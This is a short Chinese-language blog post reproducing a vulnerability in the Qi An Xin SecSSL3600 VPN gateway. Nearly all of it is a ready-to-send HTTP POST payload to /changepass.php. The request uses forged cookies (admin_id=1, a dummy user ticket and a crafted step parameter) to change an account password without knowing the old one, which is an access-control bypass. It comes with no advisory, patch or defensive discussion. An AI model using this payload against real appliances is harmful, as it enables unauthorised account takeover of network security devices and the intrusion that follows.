Babing
Published on 2024-08-30 / 1 Visits
0
0

Q1-13奇安信-网神SecSSL3600-PermissionAC

Q1-13奇安信-网神SecSSL3600-PermissionAC

漏洞复现:

payload:

POST /changepass.php?type=2 HTTP/1.1
host: 
Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}

old_pass=&password=Test123!@&repassword=Test123!@

效果图:
效果图


Comment